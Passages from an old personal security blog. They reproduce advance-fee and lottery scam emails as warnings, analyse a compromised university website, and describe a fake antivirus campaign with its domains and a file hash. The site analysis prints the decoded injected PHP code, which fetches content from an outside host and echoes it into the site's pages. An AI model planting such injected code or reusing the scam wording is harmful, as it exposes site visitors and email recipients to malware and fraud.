http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2091
http://xforce.iss.net/xforce/xfdb/58835
http://www.securityfocus.com/archive/1/archive/1/511401/100/0/threaded
http://www.exploit-db.com/exploits/12728
Wednesday, June 2, 2010
Tuesday, May 11, 2010
SPAM Mails: Part 2
Following is the SPAM mail which most of us has received and many ended up in replying to it.
Dearest One,
Good a thing to write you. I have a proposal for you; this however is not
mandatory nor will I in any manner compels you to honour against your
will.
I am Aisha Al- Salam, 23years old and the only daughter of my late
parents Mr.and Mrs.Hassan Al-salam my father was a highly reputable
business magnet - (a cocoa merchant) who operated in the capital of Cote
D Ivorie during his days.
It is sad to say that he passed away mysteriously in France during one of
his business trips abroad year 12th.Febuary 2007. Though his sudden death
was linked or rather suspected to have been masterminded by an uncle of
his who travelled with him at that time. But God knows the truth! My
mother left me when I was just 4 years old, and since then my father took
me so special.
Before his death on February 12th 2007 he called his secretary who
accompanied him to the hospital and told him that he has the sum of 7.5
million, United States Dollars.(USD$7,500.000 ) left in one of the
Leading Bank in Cote D Ivorie and he deposited the money in my name in
the bank as the next kins.
I am just 23 years old and a university undergraduate and really don't
know what to do. Now I want a foreign partner overseas where I can
transfer this fund. This is because I have suffered a lot of set backs as
a result of incessant political crisis here in Cote D Ivorie . The death
of my father actually brought sorrow to my life.
Sir, I am in a sincere desire of your humble assistance in this
regards.Your suggestions and ideas will be highly regarded. Now permit me
to ask these few questions:-
1. Can you honestly help me as your daughter?
2. Can I completely trust you?
I have decided to offer you 30% of the total amount for your willingness
to help me, Please kindly response to my mail immediately with your full
personal information, telephone number so that I can call and speak with
you on the telephone.
Please, consider this and get back to me as soon as possible.
Thank you so much.
Insallah .
My sincere regards,
Ms Aisha Al Salam.
Dearest One,
Good a thing to write you. I have a proposal for you; this however is not
mandatory nor will I in any manner compels you to honour against your
will.
I am Aisha Al- Salam, 23years old and the only daughter of my late
parents Mr.and Mrs.Hassan Al-salam my father was a highly reputable
business magnet - (a cocoa merchant) who operated in the capital of Cote
D Ivorie during his days.
It is sad to say that he passed away mysteriously in France during one of
his business trips abroad year 12th.Febuary 2007. Though his sudden death
was linked or rather suspected to have been masterminded by an uncle of
his who travelled with him at that time. But God knows the truth! My
mother left me when I was just 4 years old, and since then my father took
me so special.
Before his death on February 12th 2007 he called his secretary who
accompanied him to the hospital and told him that he has the sum of 7.5
million, United States Dollars.(USD$7,500.000 ) left in one of the
Leading Bank in Cote D Ivorie and he deposited the money in my name in
the bank as the next kins.
I am just 23 years old and a university undergraduate and really don't
know what to do. Now I want a foreign partner overseas where I can
transfer this fund. This is because I have suffered a lot of set backs as
a result of incessant political crisis here in Cote D Ivorie . The death
of my father actually brought sorrow to my life.
Sir, I am in a sincere desire of your humble assistance in this
regards.Your suggestions and ideas will be highly regarded. Now permit me
to ask these few questions:-
1. Can you honestly help me as your daughter?
2. Can I completely trust you?
I have decided to offer you 30% of the total amount for your willingness
to help me, Please kindly response to my mail immediately with your full
personal information, telephone number so that I can call and speak with
you on the telephone.
Please, consider this and get back to me as soon as possible.
Thank you so much.
Insallah .
My sincere regards,
Ms Aisha Al Salam.
SPAM Mails: Part 1
Below is the SPAM mail which I received in my INBOX. To make it realistic spammers had gone one step ahead and provided with contact numbers and few images to make it realistic and entice users to give their personal information.
FROM THE DESK OF THE DIRECTOR:
UK INTERNATIONAL LOTTERY PRIZE AWARD DEPT
WINNING NOTIFICATION FOR CATEGORY "A" WINNER ONLY
Amount Won: £1,000,000.00 Pounds
Dear Lucky winner,
We are glad to inform you that you have won a prize money of One Million
Great Britain Pound Sterlings (£1,000,000.00) in our last lottery promotional
draw.
We are pleased to inform you of the final announcement of the result in
UK INTERNATIONAL LOTTERY PRIZE AWARD DEPT. Your email address was selected by our Electronic Random Selection System (ERSS) from an exclusive list of e-mail addresses of individual and corporate bodies. No tickets were sold.
With Ref.Number: GP 14-M-246-04,
Batch Number: 573881545-UK/2010
Ticket Number: PP3502/8707-01.
CONGRATULATIONS!!!:
To file for Your Claims Please contact.
********************************************
Name: MR JOSEPH POUNCH
Tel:+447014275315
Email: josephpounch18@gmail.com
*******************************************
However you will have to fill and submit this form to the events manager for
verification & direction on how you canclaim your winning fund.
Fill the Details Below:
1. Full name...............
2. Contact Address......
3. Age.........................
4. Mobile Number.........
5. Marital Status..........
6. Sex.........................
7. Occupation..............
8. Company................
9.State:......................
10.Country..................
11.Nationality...............
12.Address.................
13.Valid ID Proof (Send as email attachment)
Your Reference and Batch number at the top of this mail:
Mrs Vivian Jones.
Lottery Coordinator
Most of the netizens fall pray for this and end up providing their information. Above details can be used to crack passwords with intelligent guesses.
Before providing information in reply to such mails think once, "who the hell in this world is going to give free money !!! "
FROM THE DESK OF THE DIRECTOR:
UK INTERNATIONAL LOTTERY PRIZE AWARD DEPT
WINNING NOTIFICATION FOR CATEGORY "A" WINNER ONLY
Amount Won: £1,000,000.00 Pounds
Dear Lucky winner,
We are glad to inform you that you have won a prize money of One Million
Great Britain Pound Sterlings (£1,000,000.00) in our last lottery promotional
draw.
We are pleased to inform you of the final announcement of the result in
UK INTERNATIONAL LOTTERY PRIZE AWARD DEPT. Your email address was selected by our Electronic Random Selection System (ERSS) from an exclusive list of e-mail addresses of individual and corporate bodies. No tickets were sold.
With Ref.Number: GP 14-M-246-04,
Batch Number: 573881545-UK/2010
Ticket Number: PP3502/8707-01.
CONGRATULATIONS!!!:
To file for Your Claims Please contact.
********************************************
Name: MR JOSEPH POUNCH
Tel:+447014275315
Email: josephpounch18@gmail.com
*******************************************
However you will have to fill and submit this form to the events manager for
verification & direction on how you canclaim your winning fund.
Fill the Details Below:
1. Full name...............
2. Contact Address......
3. Age.........................
4. Mobile Number.........
5. Marital Status..........
6. Sex.........................
7. Occupation..............
8. Company................
9.State:......................
10.Country..................
11.Nationality...............
12.Address.................
13.Valid ID Proof (Send as email attachment)
Your Reference and Batch number at the top of this mail:
Mrs Vivian Jones.
Lottery Coordinator
Most of the netizens fall pray for this and end up providing their information. Above details can be used to crack passwords with intelligent guesses.
Before providing information in reply to such mails think once, "who the hell in this world is going to give free money !!! "
Friday, October 9, 2009
Premier University of Andhra Pradesh Serving Malware.
Couple of days back I reported the infection to few Security Researchers through OWASP. Now Firefox and Google says the same!! If we visit http://www.nagarjunauniversity.ac.in/, Firefox browser alarms you with the following warning
Other way round to make sure whether it is service malicious pages or malware is: type "nagarjunauniversity" in google window and open the first link
Google description about the pages hosted by www.nagarjunauniversity.ac.in is
Real time view of malicious pages and Analysis
Visiting the site welcomes you with script execution, see diagram below
Viewing the source of this page will make you think for a while. Why Chinese and Russian links are present in the page?? Have a glimpse of the code.
Whe I reported the incident on OWASP, base64 encoded code was present on this page. Don't worry? The code is still present but on other pages. When I am writin this blog base64 encoded content was present at the following pages and many more
http://www.nagarjunauniversity.ac.in/administration.asp
http://www.nagarjunauniversity.ac.in/downloads.asp
Source code of either of the pages looks like
If you observe carefully we can see a site which is partially encoded (percentage encoding)
http%3A%2F%2Fbale.ws%2Fshow.php
Google's description had a mention about bale.ws domain.
When we open above site it gets redirected to
http://superpupermegacasino.com/which hosts *SmartDownload.exe*
Details of the EXE at Virustotal is shown as *Win32/CasOnline!Adware*. Further details about the binary can be found at
http://www.virustotal.com/
Well, decoding the base64 content with base64_decode() method present within the malicious page gives the below script which is passed as an argument to eval(). eval executes the script
error_reporting(0);
$links = new GetLinks();
echo $links->Links;
class GetLinks
{
var $host = "esli.tw";
var $path = "/link.php?site=";
var $site = "";
var $user_agent = "";
var $Links = "";
var $_socket_timeout = 12;
var $_cashe_life_time = 3600;
var $_cashe_file = "cashe.txt";
function GetLinks()
{
if (!is_file($this->_cashe_file) || (filemtime($this->_cashe_file) < (time()-$this->_cashe_life_time)) || filesize($this->_cashe_file) == 0) {
$this->site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $HTTP_SERVER_VARS['HTTP_HOST'];
$this->user_agent = $_SERVER['HTTP_USER_AGENT'];
$this->Links = $this->fetch_remote_file();
if ($handle = fopen($this->_cashe_file, 'w')) {
fwrite($handle, $this->Links);
}
fclose($handle);
}
else {
$this->Links = file_get_contents($this->_cashe_file);
}
}
function fetch_remote_file()
{
$buff = '';
$fp = fsockopen($this->host, 80, $errno, $errstr, $this->_socket_timeout);
if (!$fp) {
} else {
$out = "GET {$this->path}{$this->site} HTTP/1.1\r\n";
$out .= "Host: {$this->host}\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
$buff .= fgets($fp, 128);
}
fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
}
I am not sure what cashe.txt does and what are its contents!
The HTML Tag which is responsible for execution of scripts, malware etc is IFRAME.
Next blog will be most probably SmartDownload.exe binary analysis. Safe Surfing!!!
Other way round to make sure whether it is service malicious pages or malware is: type "nagarjunauniversity" in google window and open the first link
Google description about the pages hosted by www.nagarjunauniversity.ac.in is
Real time view of malicious pages and AnalysisVisiting the site welcomes you with script execution, see diagram below
Viewing the source of this page will make you think for a while. Why Chinese and Russian links are present in the page?? Have a glimpse of the code.
Whe I reported the incident on OWASP, base64 encoded code was present on this page. Don't worry? The code is still present but on other pages. When I am writin this blog base64 encoded content was present at the following pages and many more
http://www.nagarjunauniversity.ac.in/administration.asp
http://www.nagarjunauniversity.ac.in/downloads.asp
Source code of either of the pages looks like
If you observe carefully we can see a site which is partially encoded (percentage encoding)http%3A%2F%2Fbale.ws%2Fshow.php
Google's description had a mention about bale.ws domain.
When we open above site it gets redirected to
http://superpupermegacasino.com/which hosts *SmartDownload.exe*
Details of the EXE at Virustotal is shown as *Win32/CasOnline!Adware*. Further details about the binary can be found at
http://www.virustotal.com/
Well, decoding the base64 content with base64_decode() method present within the malicious page gives the below script which is passed as an argument to eval(). eval executes the script
error_reporting(0);
$links = new GetLinks();
echo $links->Links;
class GetLinks
{
var $host = "esli.tw";
var $path = "/link.php?site=";
var $site = "";
var $user_agent = "";
var $Links = "";
var $_socket_timeout = 12;
var $_cashe_life_time = 3600;
var $_cashe_file = "cashe.txt";
function GetLinks()
{
if (!is_file($this->_cashe_file) || (filemtime($this->_cashe_file) < (time()-$this->_cashe_life_time)) || filesize($this->_cashe_file) == 0) {
$this->site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $HTTP_SERVER_VARS['HTTP_HOST'];
$this->user_agent = $_SERVER['HTTP_USER_AGENT'];
$this->Links = $this->fetch_remote_file();
if ($handle = fopen($this->_cashe_file, 'w')) {
fwrite($handle, $this->Links);
}
fclose($handle);
}
else {
$this->Links = file_get_contents($this->_cashe_file);
}
}
function fetch_remote_file()
{
$buff = '';
$fp = fsockopen($this->host, 80, $errno, $errstr, $this->_socket_timeout);
if (!$fp) {
} else {
$out = "GET {$this->path}{$this->site} HTTP/1.1\r\n";
$out .= "Host: {$this->host}\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
$buff .= fgets($fp, 128);
}
fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
}
I am not sure what cashe.txt does and what are its contents!
The HTML Tag which is responsible for execution of scripts, malware etc is IFRAME.
Next blog will be most probably SmartDownload.exe binary analysis. Safe Surfing!!!
Friday, September 4, 2009
Personal Antivirus: antimalwarescanner8.com/ best-antivirus8.com/ hqvirusscanner.com/ advancedpcscanner3.com
I typed my search keywords into Google and clicked on few links on the first page of results. One site interested me because it was redirecting me to some other site, the malicious web page whic is redirecting to new page was embedded with unnoticeable flash file named intro.swf. The web page on the redirected site welcomes us with a pop-up window saying "Warning!!!Your system.......". The pop-up warning window is similar across all malicious domains.
If we click OK or Cross(X)/Close button it will take us to fake scanning page depicting real Anti -virus scanning of the PC.
After the scanning it gives the scan results as shown in figure below depicting a real Anti-Virus scan stating various directories on the PC are infected with trojans.
Asks the users to download "Personal Antivirus" to protect their PC.
Clicking anywhere on this page will give a pop-up window to download Anti-virus binary.
If we click on the page for multiple times it will pop-up multiple windows for downloadingAntivirus-[a-f0-9]{3,7}_2031.exe file.
If we do "View Source" on above page it will show few interesting javascript files.
Contents of listfile.js were interesting because it had an array of various file names with EXE, HLP, DLL etc extensions.
I downloaded different binary files samples but all the files had same MD5 value. Surprising !!!
Tried to execute the sample on VMware with MS Windows XP SP2 installed. It gives the following memory access error on VM. Is it detecting VM environment?!!
I executed the same sample on MS Windows Server 2003 Standard Edition with SP2 but not able to run the sample successfully.Don't try to access domains with URI
http://maliciousdomain.com/1/?sess=p2T4yjjxMi01JmlwPTY3Ljk3LjgwLjUmdGltZT0xMjU1MUAMPQZM
sess parameter is changing with every malicious domain. I was littile suspicious with the sess parameters value for base64 encoding, decoding it to ASCII gives
§døÊ8ñ2-5&ip=67.97.80.5&time=12551@ = L
Wow!! It contains an IP Address.
Malicious Domains: hqvirusscanner.com
antimalwarescanner8.com
advancedpcscanner3.com
best-antivirus8.com
antivirus-fast-scan04.com
(new domains might come up soon)
File Name: Antivirus_[a-z0-9]{3,7}.exe
Antivirus-[a-f0-9]{3,7}_2031.exe
File Size: 163840 bytes
MD5: 22fb04afad00ccaeda1f5e5892493d77
Malware Type: Browser Hijackers
Threat Level: High
- File is Packed with unknown packer.
- PEiD doesn't give any packer name.
- OllyDBG throws exception while loading the file.
- Imports few APIs from KERNEL32.DLL
http://www.virustotal.com/analisis/6a761c86645ca3b8b808a80f330ffb315dc5c175089abf7f8ff9ea2ddbbc57b2-1252076765
If I successfully run the malicious file then I will post a new blog. Be cautious while surfing the net and when you come across pop-ups!!
Sunday, August 9, 2009
Hello MicroSoft...Is SCRIPT Execution Really Safe?!!
I was editing browser settings on IE7 to allow script/applet execution. After saving the configuration I accessed a site which has an applet. As expected browser gave an error message saying " Your security settings do not allow websites to use ActiveX controls installed on your computer. This page may not display correctly. Click here for options..."
But......observe pop-up window ............!!
Scripts are usually safe.......Micro$$$$oft feels that SCRIPT execution is safe!!!
Version details of my browser, IE7, are
Version: 7.0.5730.13
Product ID: 92319-600-1753032-45410
Update Versions: 0
For "Happy Browsing" use Firefox.
But......observe pop-up window ............!!
Scripts are usually safe.......Micro$$$$oft feels that SCRIPT execution is safe!!!
Version details of my browser, IE7, are
Version: 7.0.5730.13
Product ID: 92319-600-1753032-45410
Update Versions: 0
For "Happy Browsing" use Firefox.
Subscribe to:
Comments (Atom)